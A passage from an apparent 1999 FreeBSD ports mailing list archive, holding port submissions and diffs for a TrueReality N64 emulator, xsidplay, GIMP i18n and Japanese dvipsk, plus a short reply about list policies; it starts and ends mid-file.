LDLIBS := $(LDLIBS) -lMesaGL -lMesaGLU -lglut X endif X+ifeq ($(ARCH),bsd) X+LDLIBS := $(LDLIBS) -lMesaGL -lMesaGLU X+endif X ifeq ($(ARCH),linux) X LDLIBS := $(LDLIBS) -lMesaGL -lMesaGLU -lglut X endif END-of-truereality/patches/patch-ab echo x - truereality/patches/patch-ac sed 's/^X//' >truereality/patches/patch-ac << 'END-of-truereality/patches/patch-ac' X--- N64/memory.c.ORIG Sun Nov 28 14:21:18 1999 X+++ N64/memory.c Sun Nov 28 14:23:34 1999 X@@ -346,7 +346,8 @@ X mem_shminfo[i].shmid = shmget(IPC_PRIVATE, mem_size[i], IPC_CREAT | 0777); X if(mem_shminfo[i].shmid < 0) X { X- printf("alloc_n64_mem: Couldn't get SHM ID [%d]\n\n", i); X+ printf("alloc_n64_mem: Couldn't get SHM ID [%d]\n", i); X+ printf("alloc_n64_mem: Try increasing the kernel limits SHMMAX and SHMALL\n\n"); X return(-1); X } X END-of-truereality/patches/patch-ac echo c - truereality/pkg mkdir -p truereality/pkg > /dev/null 2>&1 echo x - truereality/pkg/COMMENT sed 's/^X//' >truereality/pkg/COMMENT << 'END-of-truereality/pkg/COMMENT' XNintendo N64(tm) emulator END-of-truereality/pkg/COMMENT echo x - truereality/pkg/DESCR sed 's/^X//' >truereality/pkg/DESCR << 'END-of-truereality/pkg/DESCR' XTrueReality (TR) is a Nintendo N64(tm) emulator developed by XNiki W. Waibel mainly for learning purposes. X XFrom TR.FAQ: X XAnyway - I think that TR does not run commercial ROMs - there is too much Xstuff missing (I've not tested it - I just have heard nothing about that). X XWhat is TR for if it is not for playing commercial ROMs? XA: 1) TR should be a tool for demo writers. X 2) TR should be an open emu project where everyone can learn from it. X 3) TR should be an example (one time) for implementing/learning asm under X various machines. X If someones hacks out iP-MMX routines you can compare it with the C ones X and learn how things are done with MMX. X XWhere can I get ROMs? XA: There are demos at http://www.dextrose.com. X XWWW: http://www.emuhq.com/truereality/ X X- Mario S F Ferreira Xlioux@linf.unb.br END-of-truereality/pkg/DESCR echo x - truereality/pkg/PLIST sed 's/^X//' >truereality/pkg/PLIST << 'END-of-truereality/pkg/PLIST' Xbin/TrueReality Xbin/truereality END-of-truereality/pkg/PLIST echo x - truereality/Makefile sed 's/^X//' >truereality/Makefile << 'END-of-truereality/Makefile' X# New ports collection makefile for: truereality X# Version required: 1999062900 X# Date Created: 28 November 1999 X# Whom: Mario S F Ferreira et al. X# X# $FreeBSD: ports/emulator/truereality/Makefile,v 1.0 1999/11/28 16:56:01 lioux Exp $ X XDISTNAME= TrueReality-${DATE} XPKGNAME= truereality-1999062900 XCATEGORIES= emulator devel XMASTER_SITES= http://www.emuhq.com/emulators/ XEXTRACT_SUFX= .tgz X XMAINTAINER= lioux@linf.unb.br X XLIB_DEPENDS= MesaGL.14:${PORTSDIR}/graphics/Mesa3 \ X MesaGLU.14:${PORTSDIR}/graphics/Mesa3 \ X X11.6:${PORTSDIR}/x11/XFree86 \ X Xext.6:${PORTSDIR}/x11/XFree86 X XUSE_GMAKE= yes XUSE_XLIB= yes X XWRKSRC= ${WRKDIR}/TrueReality/Source X XDATE= 1999062900 X Xdo-install: X @${INSTALL_PROGRAM} ${WRKSRC}/TrueReality ${PREFIX}/bin X @${LN} -sf ${PREFIX}/bin/TrueReality ${PREFIX}/bin/truereality X X.include END-of-truereality/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 12:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD05815326 for ; Sun, 28 Nov 1999 12:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA57696; Sun, 28 Nov 1999 12:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from totem.fix.no (totem.freenix.no [195.0.166.42]) by hub.freebsd.org (Postfix) with ESMTP id E4AB914C0D for ; Sun, 28 Nov 1999 12:20:15 -0800 (PST) (envelope-from anders@totem.fix.no) Received: by totem.fix.no (Postfix, from userid 1000) id 83A3D574D; Sun, 28 Nov 1999 21:20:13 +0100 (CET) Message-Id: <19991128202013.83A3D574D@totem.fix.no> Date: Sun, 28 Nov 1999 21:20:13 +0100 (CET) From: Anders Nordby Reply-To: Anders Nordby To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15147: New port: audio/xsidplay Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15147 >Category: ports >Synopsis: New port: audio/xsidplay >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 12:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Anders Nordby >Release: FreeBSD 3.3-STABLE i386 >Organization: Fluxpod Information eXchange >Environment: FreeBSD eggsilo.nome.no 3.3-STABLE FreeBSD 3.3-STABLE #0: Wed Nov 24 00:15:14 CET 1999 root@eggsilo.nome.no:/usr/src/sys/compile/EGGSILO i386 >Description: Xsidplay - a graphical front end for libsidplay. Long live the C= 64! >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # xsidplay # xsidplay/Makefile # xsidplay/files # xsidplay/files/md5 # xsidplay/pkg # xsidplay/pkg/PLIST # xsidplay/pkg/COMMENT # xsidplay/pkg/DESCR # echo c - xsidplay mkdir -p xsidplay > /dev/null 2>&1 echo x - xsidplay/Makefile sed 's/^X//' >xsidplay/Makefile << 'END-of-xsidplay/Makefile' X# New ports collection makefile for: xsidplay X# Version required: 1.3.8 X# Date created: 28 November 1999 X# Whom: Anders Nordby X# X# $FreeBSD$ X# X XDISTNAME= xsidplay-1_3_8 XPKGNAME= xsidplay-1.3.8 XCATEGORIES= audio emulators XMASTER_SITES= http://www.geocities.com/SiliconValley/Lakes/5147/sidplay/packages/ \ X http://www.freenix.no/~anders/ XEXTRACT_SUFX= _tar.gz X XMAINTAINER= anders@fix.no X XBUILD_DEPENDS= sidplay:${PORTSDIR}/audio/sidplay X XGNU_CONFIGURE= YES X XUSE_GMAKE= YES XUSE_QT= YES X XWRKSRC= ${WRKDIR}/${PKGNAME} X Xdo-install: X ${INSTALL_PROGRAM} ${WRKSRC}/src/xsidplay ${PREFIX}/bin X X.include END-of-xsidplay/Makefile echo c - xsidplay/files mkdir -p xsidplay/files > /dev/null 2>&1 echo x - xsidplay/files/md5 sed 's/^X//' >xsidplay/files/md5 << 'END-of-xsidplay/files/md5' XMD5 (xsidplay-1_3_8_tar.gz) = 9b22b10115323f87fd208a798b5252f1 END-of-xsidplay/files/md5 echo c - xsidplay/pkg mkdir -p xsidplay/pkg > /dev/null 2>&1 echo x - xsidplay/pkg/PLIST sed 's/^X//' >xsidplay/pkg/PLIST << 'END-of-xsidplay/pkg/PLIST' Xbin/xsidplay END-of-xsidplay/pkg/PLIST echo x - xsidplay/pkg/COMMENT sed 's/^X//' >xsidplay/pkg/COMMENT << 'END-of-xsidplay/pkg/COMMENT' XGraphical front end for libsidplay END-of-xsidplay/pkg/COMMENT echo x - xsidplay/pkg/DESCR sed 's/^X//' >xsidplay/pkg/DESCR << 'END-of-xsidplay/pkg/DESCR' XXSIDPLAY is a graphical front end (uses Qt) for libsidplay. SIDPLAY Xemulates the Sound Interface Device chip (MOS 6581, commonly called XSID) and the Micro Processor Unit (MOS 6510) of the Commodore 64. Listen Xto all those SID-tunes you remember so well again. X XWWW: http://www.geocities.com/SiliconValley/Lakes/5147/ XHVSC: http://home.freeuk.net/wazzaw/HVSC/ END-of-xsidplay/pkg/DESCR exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 12:39:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from po4.glue.umd.edu (po4.glue.umd.edu [128.8.10.124]) by hub.freebsd.org (Postfix) with ESMTP id 8F7D714A2B for ; Sun, 28 Nov 1999 12:39:37 -0800 (PST) (envelope-from bfoz@glue.umd.edu) Received: from glue.umd.edu (poseidon.student.umd.edu [129.2.220.99]) by po4.glue.umd.edu (8.9.3/8.9.3) with ESMTP id PAA16214; Sun, 28 Nov 1999 15:39:32 -0500 (EST) Message-ID: <384192E5.11FAE2B8@glue.umd.edu> Date: Sun, 28 Nov 1999 15:39:01 -0500 From: Brandon Fosdick X-Mailer: Mozilla 4.7 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Ariel Burbaickij Cc: freebsd-ports@FreeBSD.ORG Subject: Re: dare to repost References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ariel Burbaickij wrote: > > I posted this message already but it come out that i wa not in the list. > Well ,once more what are the policies accepted int th list. > Some DO and DONTS and I probably most important:Will the questions > related to troubles using ports be tolerated? > > kind regards, > Ariel Start here. http://www.freebsd.org/handbook/eresources.html#ERESOURCES-MAIL -- bfoz@glue.umd.edu "Lead, follow, or get run over" "In life there are those who steer, and those who push" "I'm not impatient, the world is too slow" "Life is short, so have fun, play hard, and leave a good looking corpse" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 13:30:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2BEDC152A1 for ; Sun, 28 Nov 1999 13:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA61953; Sun, 28 Nov 1999 13:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from narcissus.pel.sys.hiroshima-u.ac.jp (ppp-saijo-196.ipc.hiroshima-u.ac.jp [133.41.4.196]) by hub.freebsd.org (Postfix) with ESMTP id 6126214C5A for ; Sun, 28 Nov 1999 13:29:38 -0800 (PST) (envelope-from nobutaka@narcissus.pel.sys.hiroshima-u.ac.jp) Received: (from nobutaka@localhost) by narcissus.pel.sys.hiroshima-u.ac.jp (8.9.3/8.9.3) id GAA04495; Mon, 29 Nov 1999 06:29:34 +0900 (JST) (envelope-from nobutaka) Message-Id: <199911282129.GAA04495@narcissus.pel.sys.hiroshima-u.ac.jp> Date: Mon, 29 Nov 1999 06:29:34 +0900 (JST) From: nobutaka@nobutaka.com Reply-To: nobutaka@nobutaka.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15148: Update port: graphics/gimp1-i18n Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15148 >Category: ports >Synopsis: Update port: graphics/gimp1-i18n >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 13:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: MANTANI Nobutaka >Release: FreeBSD 4.0-CURRENT i386 >Organization: Hiroshima University >Environment: >Description: Update from 1.1.11 to 1.1.13. >How-To-Repeat: >Fix: diff -urN gimp1-i18n.old/Makefile gimp1-i18n/Makefile --- gimp1-i18n.old/Makefile Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/Makefile Mon Nov 29 06:11:40 1999 @@ -1,17 +1,17 @@ # New ports collection makefile for: GIMP with I18N extension -# Version required: 1.1.11 +# Version required: 1.1.13 # Date created: 1 Mar 1999 # Whom: nobutaka@nobutaka.com # # $FreeBSD: ports/graphics/gimp1-i18n/Makefile,v 1.65 1999/11/19 21:36:15 sada Exp $ # -DISTNAME= gimp-1.1.11 -PKGNAME= gimp-i18n-1.1.11 +DISTNAME= gimp-1.1.13 +PKGNAME= gimp-i18n-1.1.13 CATEGORIES= graphics -MASTER_SITES= ftp://ftp.gimp.org/pub/gimp/unstable/v1.1.11/ \ - ftp://ftp.cs.umn.edu/pub/gimp/gimp/unstable/v1.1.11/ \ - http://www.ameth.org/gimp/pub/gimp/unstable/v1.1.11/ +MASTER_SITES= ftp://ftp.gimp.org/pub/gimp/unstable/v1.1.13/ \ + ftp://ftp.cs.umn.edu/pub/gimp/gimp/unstable/v1.1.13/ \ + http://www.ameth.org/gimp/pub/gimp/unstable/v1.1.13/ MAINTAINER= nobutaka@nobutaka.com diff -urN gimp1-i18n.old/files/md5 gimp1-i18n/files/md5 --- gimp1-i18n.old/files/md5 Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/files/md5 Mon Nov 29 06:11:40 1999 @@ -1 +1 @@ -MD5 (gimp-1.1.11.tar.bz2) = c22832463f6a6333c1cab549dba8bcbc +MD5 (gimp-1.1.13.tar.bz2) = 092d118a57f37eeb4b2fcd2dccbdb245 diff -urN gimp1-i18n.old/patches/patch-ap gimp1-i18n/patches/patch-ap --- gimp1-i18n.old/patches/patch-ap Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/patches/patch-ap Mon Nov 29 06:11:40 1999 @@ -1,7 +1,7 @@ ---- libgimp/Makefile.in.orig Tue Oct 26 11:04:00 1999 -+++ libgimp/Makefile.in Tue Oct 26 11:04:34 1999 +--- libgimp/Makefile.in.orig Wed Nov 24 06:58:03 1999 ++++ libgimp/Makefile.in Wed Nov 24 06:58:47 1999 @@ -207,11 +207,11 @@ - gimpinclude_HEADERS = color_display.h color_selector.h gimp.h gimpchainbutton.h gimpcompat.h gimpenums.h gimpenv.h gimpexport.h gimpfeatures.h gimpfileselection.h gimplimits.h gimpmath.h gimpmatrix.h gimpmenu.h gimpmodule.h gimppatheditor.h gimpsizeentry.h gimpui.h gimpunit.h gimpunitmenu.h gimpintl.h gserialize.h parasite.h parasiteF.h parasiteP.h parasiteio.h + gimpinclude_HEADERS = color_display.h color_selector.h gimp.h gimpchainbutton.h gimpcolorbutton.h gimpcompat.h gimpenums.h gimpenv.h gimpexport.h gimpfeatures.h gimpfileselection.h gimplimits.h gimpmath.h gimpmatrix.h gimpmenu.h gimpmodule.h gimppatheditor.h gimpsizeentry.h gimpui.h gimpunit.h gimpunitmenu.h gimpintl.h gserialize.h parasite.h parasiteF.h parasiteP.h parasiteio.h -libgimp_la_LDFLAGS = -version-info $(LT_CURRENT):$(LT_REVISION):$(LT_AGE) -release $(LT_RELEASE) diff -urN gimp1-i18n.old/patches/patch-bo gimp1-i18n/patches/patch-bo --- gimp1-i18n.old/patches/patch-bo Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/patches/patch-bo Mon Nov 29 06:11:40 1999 @@ -1,6 +1,6 @@ ---- plug-ins/print/print.c.orig Mon Oct 4 08:53:53 1999 -+++ plug-ins/print/print.c Thu Oct 7 14:20:11 1999 -@@ -2153,7 +2153,7 @@ +--- plug-ins/print/print.c.orig Wed Nov 24 15:43:30 1999 ++++ plug-ins/print/print.c Wed Nov 24 15:48:35 1999 +@@ -2163,7 +2163,7 @@ plist[0].output_type = OUTPUT_COLOR; #ifdef LPC_COMMAND diff -urN gimp1-i18n.old/pkg/PLIST gimp1-i18n/pkg/PLIST --- gimp1-i18n.old/pkg/PLIST Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/pkg/PLIST Mon Nov 29 06:11:40 1999 @@ -40,11 +40,11 @@ include/libgimp/parasiteio.h include/megawidget.h lib/libgck.so -lib/libgck.so.11 +lib/libgck.so.13 lib/libgimp.so -lib/libgimp.so.11 +lib/libgimp.so.13 lib/libgimpui.so -lib/libgimpui.so.11 +lib/libgimpui.so.13 lib/libgpc.a lib/libmegawidget.a @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R @@ -77,6 +77,7 @@ libexec/gimp/1.1/plug-ins/checkerboard libexec/gimp/1.1/plug-ins/color_enhance libexec/gimp/1.1/plug-ins/colorify +libexec/gimp/1.1/plug-ins/colortoalpha libexec/gimp/1.1/plug-ins/compose libexec/gimp/1.1/plug-ins/convmatrix libexec/gimp/1.1/plug-ins/csource @@ -166,7 +167,6 @@ libexec/gimp/1.1/plug-ins/rcm libexec/gimp/1.1/plug-ins/ripple libexec/gimp/1.1/plug-ins/rotate -libexec/gimp/1.1/plug-ins/rotators libexec/gimp/1.1/plug-ins/sample_colorize libexec/gimp/1.1/plug-ins/scatter_hsv libexec/gimp/1.1/plug-ins/screenshot @@ -783,6 +783,7 @@ share/gimp/help/C/layers/merge_down.html share/gimp/help/C/layers/stack/index.html share/gimp/help/C/layers/stack/stack.html +share/gimp/help/C/modes.html share/gimp/help/C/open/index.html share/gimp/help/C/open/open_by_extension.html share/gimp/help/C/paths/copy_path.html @@ -1040,6 +1041,7 @@ share/gimp/tips/gimp_tips.it.txt share/gimp/tips/gimp_tips.ja.txt share/gimp/tips/gimp_tips.ko.txt +share/gimp/tips/gimp_tips.pl.txt share/gimp/tips/gimp_tips.ru.txt share/gimp/tips/gimp_tips.txt share/gimp/unitrc diff -urN gimp1-i18n.old/pkg/PLIST.gnome gimp1-i18n/pkg/PLIST.gnome --- gimp1-i18n.old/pkg/PLIST.gnome Mon Nov 29 06:11:58 1999 +++ gimp1-i18n/pkg/PLIST.gnome Mon Nov 29 06:11:40 1999 @@ -40,11 +40,11 @@ include/libgimp/parasiteio.h include/megawidget.h lib/libgck.so -lib/libgck.so.11 +lib/libgck.so.13 lib/libgimp.so -lib/libgimp.so.11 +lib/libgimp.so.13 lib/libgimpui.so -lib/libgimpui.so.11 +lib/libgimpui.so.13 lib/libgpc.a lib/libmegawidget.a @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R @@ -77,6 +77,7 @@ libexec/gimp/1.1/plug-ins/checkerboard libexec/gimp/1.1/plug-ins/color_enhance libexec/gimp/1.1/plug-ins/colorify +libexec/gimp/1.1/plug-ins/colortoalpha libexec/gimp/1.1/plug-ins/compose libexec/gimp/1.1/plug-ins/convmatrix libexec/gimp/1.1/plug-ins/csource @@ -167,7 +168,6 @@ libexec/gimp/1.1/plug-ins/rcm libexec/gimp/1.1/plug-ins/ripple libexec/gimp/1.1/plug-ins/rotate -libexec/gimp/1.1/plug-ins/rotators libexec/gimp/1.1/plug-ins/sample_colorize libexec/gimp/1.1/plug-ins/scatter_hsv libexec/gimp/1.1/plug-ins/screenshot @@ -784,6 +784,7 @@ share/gimp/help/C/layers/merge_down.html share/gimp/help/C/layers/stack/index.html share/gimp/help/C/layers/stack/stack.html +share/gimp/help/C/modes.html share/gimp/help/C/open/index.html share/gimp/help/C/open/open_by_extension.html share/gimp/help/C/paths/copy_path.html @@ -1041,6 +1042,7 @@ share/gimp/tips/gimp_tips.it.txt share/gimp/tips/gimp_tips.ja.txt share/gimp/tips/gimp_tips.ko.txt +share/gimp/tips/gimp_tips.pl.txt share/gimp/tips/gimp_tips.ru.txt share/gimp/tips/gimp_tips.txt share/gimp/unitrc >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 13:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 903C714BEE for ; Sun, 28 Nov 1999 13:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA62677; Sun, 28 Nov 1999 13:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D7F1914C5A; Sun, 28 Nov 1999 13:30:42 -0800 (PST) Message-Id: <19991128213042.D7F1914C5A@hub.freebsd.org> Date: Sun, 28 Nov 1999 13:30:42 -0800 (PST) From: watanabe@zlab.phys.nagoya-u.ac.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15149: Delete interactive feature of ja-dvipsk-* ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15149 >Category: ports >Synopsis: Delete interactive feature of ja-dvipsk-* ports >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 13:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Makoto WATANABE >Release: FreeBSD 3.2-RELEASE i386 >Organization: Z lab. Division of Particle and Astrophysical Science, Nagoya University, JAPAN >Environment: >Description: The interactive feature for install of 'ja-dvipsk-*' ports is imcomplete and have some problems. Because this feature isn't necessary specially for the ports, I have deleted the interactive feature to simple. And because we can choose some packages of virtual fonts for 'ja-dvipsk-*' ports now, I have deleted the dependency for 'ja-vftool' ports. I put the patches for 'japanese/dvipsk' and 'japanese/dvipsk-vflib' below "Fix:". Because these patches don't include the modifications for pkg/INSTALL files, please delete pkg/INSTALL files manually. Changed files are dvipsk/Makefile dvipsk/pkg/DESCR dvipsk/pkg/PLIST dvipsk-vflib/Makefile dvipsk-vflib/pkg/DESCR dvipsk-vflib/pkg/PLIST Added files are dvipsk/pkg/MESSAGE dvipsk-vflib/pkg/MESSAGE Deleted files are dvipsk/pkg/INSTALL dvipsk-vflib/pkg/INSTALL - Makoto WATANABE watanabe@zlab.phys.nagoya-u.ac.jp >How-To-Repeat: >Fix: diff -ruN dvipsk.orig/Makefile dvipsk/Makefile --- dvipsk.orig/Makefile Sun Oct 24 21:06:38 1999 +++ dvipsk/Makefile Mon Nov 29 04:13:19 1999 @@ -17,8 +17,7 @@ MAINTAINER= watanabe@zlab.phys.nagoya-u.ac.jp -RUN_DEPENDS= ptex-common:${PORTSDIR}/japanese/ptex-common \ - ${LOCALBASE}/share/fonts/vf-a2bk:${PORTSDIR}/japanese/vftool +RUN_DEPENDS= ptex-common:${PORTSDIR}/japanese/ptex-common MANUAL_PACKAGE_BUILD= incompatible with other versions of dvipsk-* @@ -27,7 +26,6 @@ CONFIGURE_ENV= ac_cv_path_install="${INSTALL} -c -o ${BINOWN} -g ${BINGRP}" SCRIPTS_ENV= MV=${MV} SED=${SED} MAN1= dvips.1 afm2tfm.1 -IS_INTERACTIVE= yes TEXMF= ${PREFIX}/share/texmf DVIPSDIR= ${TEXMF}/dvips @@ -83,12 +81,6 @@ done @${LN} -fs ${DVIPSDIR}/contrib ${PREFIX}/share/doc/dvips/contrib .endif -.if defined(BATCH) - @${SETENV} PKG_PREFIX=${PREFIX} BATCH=yes \ - ${SH} ${PKGDIR}/INSTALL ${PKGNAME} POST-INSTALL -.else - @${SETENV} PKG_PREFIX=${PREFIX} \ - ${SH} ${PKGDIR}/INSTALL ${PKGNAME} POST-INSTALL -.endif + @${CAT} ${PKGDIR}/MESSAGE .include diff -ruN dvipsk.orig/pkg/DESCR dvipsk/pkg/DESCR --- dvipsk.orig/pkg/DESCR Mon Jul 20 00:00:00 1998 +++ dvipsk/pkg/DESCR Mon Nov 29 04:13:19 1999 @@ -7,12 +7,13 @@ The dvipsk program is modified version of Tom Rokicki's dvips and use the kpathsea library for configuration and path searching. You may have to set some variables in the path configuration file for -kpathsea /usr/local/share/texmf/web2c/texmf.cnf so that the program +kpathsea `/usr/local/share/texmf/web2c/texmf.cnf' so that the program can find PK fonts, Virtual fonts and TFM files. For example, -PKFONTS = .:/usr/local/lib/fonts//:{$TEXMF/fonts:$VARTEXFONTS}//pk// -VFFONTS = .:/usr/local/share/fonts/vf-a2bk:$TEXMF/fonts//vf// -TFMFONTS = .:/usr/local/share/fonts/vf-a2bk:{$TEXMF/fonts:$VARTEXFONTS}//tfm// +PKFONTS = .:/usr/local/lib/fonts/{pk118:pk240:pk300:pk360:pk400:pk600}:{$TEXMF +/fonts:$VARTEXFONTS}//pk/{$MAKETEX_MODE:modeless}// +VFFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts}//vf// +TFMFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts:$VARTEXFONTS}//tfm// - Makoto WATANABE watanabe@zlab.phys.nagoya-u.ac.jp diff -ruN dvipsk.orig/pkg/MESSAGE dvipsk/pkg/MESSAGE --- dvipsk.orig/pkg/MESSAGE Thu Jan 1 09:00:00 1970 +++ dvipsk/pkg/MESSAGE Mon Nov 29 04:13:19 1999 @@ -0,0 +1,13 @@ +****************************************************************************** +This program requires some japanese virtual fonts. For that purpose, +you can install `ja-makejvf-fkr-1.0' or `ja-vftool-1.2' package. + +Also you may have to set some variables in the path configuration file +for kpathsea `/usr/local/share/texmf/web2c/texmf.cnf' so that the +program can find PK fonts, Virtual fonts and TFM files. For example, + +PKFONTS = .:/usr/local/lib/fonts/{pk118:pk240:pk300:pk360:pk400:pk600}:{$TEXMF +/fonts:$VARTEXFONTS}//pk/{$MAKETEX_MODE:modeless}// +VFFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts}//vf// +TFMFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts:$VARTEXFONTS}//tfm// +****************************************************************************** diff -ruN dvipsk.orig/pkg/PLIST dvipsk/pkg/PLIST --- dvipsk.orig/pkg/PLIST Sun Oct 24 21:06:38 1999 +++ dvipsk/pkg/PLIST Mon Nov 29 04:13:19 1999 @@ -118,4 +118,3 @@ @dirrm share/texmf/tex/latex209/dvips @dirrm share/texmf/tex/latex209 @dirrm share/doc/dvips -@unexec if [ -f %D/share/texmf/web2c/texmf.cnf.bak ] ; then rm -f %D/share/texmf/web2c/texmf.cnf ; mv %D/share/texmf/web2c/texmf.cnf.bak %D/share/texmf/web2c/texmf.cnf ; fi diff -ruN dvipsk-vflib.orig/Makefile dvipsk-vflib/Makefile --- dvipsk-vflib.orig/Makefile Sun Oct 24 21:06:38 1999 +++ dvipsk-vflib/Makefile Mon Nov 29 04:13:19 1999 @@ -19,8 +19,7 @@ MAINTAINER= watanabe@zlab.phys.nagoya-u.ac.jp -RUN_DEPENDS= ptex-common:${PORTSDIR}/japanese/ptex-common \ - ${LOCALBASE}/share/fonts/vf-a2bk:${PORTSDIR}/japanese/vftool +RUN_DEPENDS= ptex-common:${PORTSDIR}/japanese/ptex-common LIB_DEPENDS= VFlib2.24:${PORTSDIR}/japanese/vflib MANUAL_PACKAGE_BUILD= incompatible with other versions of dvipsk-* @@ -31,7 +30,6 @@ MAKE_FLAGS= XCFLAGS="-I${PREFIX}/include" XLOADLIBES="-L${PREFIX}/lib" SCRIPTS_ENV= MV=${MV} SED=${SED} MAN1= dvips.1 afm2tfm.1 -IS_INTERACTIVE= yes TEXMF= ${PREFIX}/share/texmf DVIPSDIR= ${TEXMF}/dvips @@ -88,12 +86,6 @@ done @${LN} -fs ${DVIPSDIR}/contrib ${PREFIX}/share/doc/dvips/contrib .endif -.if defined(BATCH) - @${SETENV} PKG_PREFIX=${PREFIX} BATCH=yes \ - ${SH} ${PKGDIR}/INSTALL ${PKGNAME} POST-INSTALL -.else - @${SETENV} PKG_PREFIX=${PREFIX} \ - ${SH} ${PKGDIR}/INSTALL ${PKGNAME} POST-INSTALL -.endif + @${CAT} ${PKGDIR}/MESSAGE .include diff -ruN dvipsk-vflib.orig/pkg/DESCR dvipsk-vflib/pkg/DESCR --- dvipsk-vflib.orig/pkg/DESCR Mon Jul 20 00:00:00 1998 +++ dvipsk-vflib/pkg/DESCR Mon Nov 29 04:13:19 1999 @@ -7,12 +7,13 @@ The dvipsk program is modified version of Tom Rokicki's dvips and use the kpathsea library for configuration and path searching. You may have to set some variables in the path configuration file for -kpathsea /usr/local/share/texmf/web2c/texmf.cnf so that the program +kpathsea `/usr/local/share/texmf/web2c/texmf.cnf' so that the program can find PK fonts, Virtual fonts and TFM files. For example, -PKFONTS = .:/usr/local/lib/fonts//:{$TEXMF/fonts:$VARTEXFONTS}//pk// -VFFONTS = .:/usr/local/share/fonts/vf-a2bk:$TEXMF/fonts//vf// -TFMFONTS = .:/usr/local/share/fonts/vf-a2bk:{$TEXMF/fonts:$VARTEXFONTS}//tfm// +PKFONTS = .:/usr/local/lib/fonts/{pk118:pk240:pk300:pk360:pk400:pk600}:{$TEXMF +/fonts:$VARTEXFONTS}//pk/{$MAKETEX_MODE:modeless}// +VFFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts}//vf// +TFMFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts:$VARTEXFONTS}//tfm// - Makoto WATANABE watanabe@zlab.phys.nagoya-u.ac.jp diff -ruN dvipsk-vflib.orig/pkg/MESSAGE dvipsk-vflib/pkg/MESSAGE --- dvipsk-vflib.orig/pkg/MESSAGE Thu Jan 1 09:00:00 1970 +++ dvipsk-vflib/pkg/MESSAGE Mon Nov 29 04:13:19 1999 @@ -0,0 +1,13 @@ +****************************************************************************** +This program requires some japanese virtual fonts. For that purpose, +you can install `ja-makejvf-fkr-1.0' or `ja-vftool-1.2' package. + +Also you may have to set some variables in the path configuration file +for kpathsea `/usr/local/share/texmf/web2c/texmf.cnf' so that the +program can find PK fonts, Virtual fonts and TFM files. For example, + +PKFONTS = 